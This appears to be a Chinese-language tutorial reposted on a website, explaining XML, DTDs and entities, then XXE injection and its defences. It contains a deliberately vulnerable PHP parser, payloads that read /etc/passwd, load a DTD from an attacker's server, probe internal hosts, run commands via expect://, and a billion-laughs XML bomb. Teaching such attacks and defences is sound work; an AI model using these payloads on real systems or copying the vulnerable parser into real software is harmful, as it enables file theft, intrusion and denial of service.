赞
踩
XML全称:可扩展标记语言(Extensible Markup Language)。
XML是独立于软件和硬件的信息传输工具,它把数据从HTML中分离。 XML语言没有预定义的标签,需要作者定义自己的标签和自己的文档结构。
XML 被设计用来传输和存储数据,HTML 被设计用来显示数据。
DTD : 文档类型定义 部分定义了XML文档的标签以及元素属性。上图DTD 就定义了XML的根元素为 note,然后根元素下面有一些子元素 (to,from,heading,body),那么下面的文档元素就可以使用这些元素。
PCDATA:可被解析的字符数据。PCDATA 数据类型是会被解析器解析的文本。这些文本将被解析器检查 实体 以及 标记。文本中的标签会被当作标记来处理,而实体会被展开。与之对应的是CDATA。
CDATA:不被解析的字符数据,CDATA 数据类型是不会被解析器解析的文本,在这些文本中的标签不会被当作标记来对 待,其中的实体也不会被展开。
内部DTD声明
声明格式: <!DOCTYPE 根元素 [元素声明]>
如上例使用就是内部 DTD声明。
外部DTD声明
声明格式: <!DOCTYPE 根元素 SYSTEM "文件名">
通过引入 DTD文件的方式进行声明(这一点和 css,javascript 很像)。
<?xml version="1.0"?> <!DOCTYPE note SYSTEM "test.dtd"> <note> <to>H</to> <from>E</from> <head>L</head> <body>LO</body> </note>test.dtd
<!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型--> <!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型--> <!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型--> <!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->
按实体值所在位置分类(实体定义在 DTD声明中)
内部实体:就是把实体值定义在内部声明中。
<?xml version="1.0"?> <!DOCTYPE sss [ <!ELEMENT sss ANY > <!ENTITY xxe "hello" > ]> <sss> <user>&xxe;</user> <pass>pass</pass> </sss>这里定义元素为 ANY 表示可以接受任何元素作为标签,这里的
"xxe"
就是我们所说的实体了(相当于一个变量),可以在XML文档元素中使用&
符号对实体进行引用。到时候输出的时候&xxe;
就会被hello
替换。外部实体:把实体定义在外部文件中。
<?xml version="1.0"?> <!DOCTYPE sss [ <!ELEMENT sss ANY > <!ENTITY xxe SYSTEM "file:///D:/test.dtd" > //引入外部dtd文件 ]> <sss> <user>&xxe;</user> <pass>pass</pass> </sss>这样当需要更改实体的值时,只需要更改外部的 dtd 文件就行,不需要打开源码更改了(降低了耦合性),但也带来了安全漏洞。
不同程序支持的协议不同:
按实体类型分类
通用实体
用
&实体名;
引用,在DTD 中定义(内外DTD都行),在 XML文档元素中引用。上面的例子都是通用实体。参数实体
使用
% 实体名
(中间有空格) 在DTD中定义(内外DTD都行),并且只能在DTD中使用%实体名;
引用。在 DTD 文件中,参数实体的声明可以引用这两种实体。
<?xml version="1.0" encoding="utf-8"> <!DOCTYPE Author [ <!ENTITY % first "Hello"> <!ENTITY % second "%first;_World"> %second;]>
%second;
会解析为:Hello_World
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。XML解析依赖库libxml默认开启了对外部实体的引用(libxml<2.9 默认开启),导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行、内网扫描等危害。
解析XML的php文件: test.php
<?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); echo $creds; ?>
正常的XML文件
<?xml version="1.0"?> <!DOCTYPE s [ <!ELEMENT s ANY > <!ENTITY xxe SYSTEM "file:///D:/test.dtd" > ]> <s> <user>&xxe;</user> <pass>pass</pass> </s>将正常的外部文件路径换成敏感文件的路径,即可读出敏感文件内容。
方式一:直接通过外部实体声明:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]> <a>&b;</a>方式二:外部实体声明 (通用实体)+ 外部 DTD文件:
<?xml version="1.0"?> <!DOCTYPE a SYSTEM "http://XXX/test.dtd"> <c>&b;</c> 这里的 http://XXX/test.dtd 是攻击者自己服务器上的文件。 <!ENTITY b SYSTEM "file:///etc/passwd">方式三:外部实体声明(参数实体) + 引入外部实体声明:
<?xml version="1.0"?> <!DOCTYPE a[ <!ENTITY % d SYSTEM "http://XXX/test.dtd"> %d; ]> <c>&b;</c> test.dtd内容: <!ENTITY b SYSTEM "file:///etc/passwd">注意这种方式必须要先引用 参数实体,才能引用通用实体,且缺一不可。
XML 外部实体中是可以使用http://协议,可以利用该请求去探查内网。
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]> <root> <name>&xxe;</name> </root>
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE xxe [
- <!ELEMENT name ANY >
- <!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]>
- <root>
- <name>&xxe;</name>
- </root>
在安装 expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令。
因为PHP的 expect 并不是默认安装扩展,所以命令执行比较难利用。
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "expect://cat /" >]> <root> <name>&xxe;</name> </root>
几乎所有可以控制服务器资源利用的东西,都可用于制造DOS攻击。通过XML外部实体注入,攻击者可以发送任意的HTTP请求,因为解析器会解析文档中的所有实体,所以如果实体声明层层嵌套的话,在一定数量上可以对服务器器造成DoS。
常见的XML炸弹:
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>攻击原理:XML解析器尝试解析该文件时,DTD中的实体会以指数级的数量级展开,lol 实体为 “lol” 字符串,然后一个 lol2 实体引用了 10 次 lol 实体,一个 lol3 实体引用了 10 次 lol2 实体,此时一个 lol3 实体就含有
10^2
个 “lol” 了,以此类推,lol9 实体含有10^8
个 “lol” 字符串,所以这个1K不到的文件经过解析后会占用到3G的内存,可见有多恐怖,不过现代的服务器软硬件大多已经抵御了此类攻击。防御XML炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。
方法一:使用开发语言提供的禁用外部实体的方法
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
方法二:过滤用户输入
过滤用户提交的XML数据 ,关键词:
<!DOCTYPE>、<!ENTITY>、SYSTEM、PUBLIC
。
参考资料:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。